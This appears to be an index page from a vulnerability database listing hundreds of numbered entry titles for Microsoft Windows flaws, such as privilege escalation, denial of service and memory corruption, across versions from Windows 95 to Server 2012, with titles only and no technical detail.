[53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE privilege escalation [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition 